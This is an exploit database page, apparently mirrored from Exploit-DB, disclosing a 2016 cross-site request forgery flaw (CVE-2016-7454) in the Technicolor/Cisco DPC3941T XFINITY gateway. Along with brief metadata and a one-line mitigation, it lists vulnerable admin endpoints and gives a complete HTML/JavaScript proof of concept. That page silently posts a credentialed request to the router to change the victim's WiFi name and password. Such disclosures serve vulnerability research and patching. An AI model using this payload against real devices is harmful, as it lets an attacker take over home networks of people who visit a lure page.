header-logo
Suggest Exploit
vendor:
DPC3941T
by:
Ayushman Dutta
8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: DPC3941T
Affected Version From: dpc3941-P20-18-v303r20421733-160413a-CMCST
Affected Version To: dpc3941-P20-18-v303r20421733-160413a-CMCST
Patch Exists: YES
Related CWE: CVE-2016-7454
CPE: h:technicolor:dpc3941t
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016

CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T

The Device DPC3941T is vulnerable to CSRF and has no security on the entire admin panel for it. A simple HTML page with javascript on which the attacker lures the victim can be used to change state in the application.

Mitigation:

Implementing CSRF protection on the application, using tokens or other methods to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
# Date: 09/08/2016
# Exploit Author: Ayushman Dutta
# Version:  dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454

The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:

<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php

A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.

<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
"network_name":"MyName", "wireless_mode":"a,n,ac",
"security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
"channel_number":"40", "network_password":"password",
"broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST","
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
true);
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>

Navigation

Suggest Exploit

Services By CQR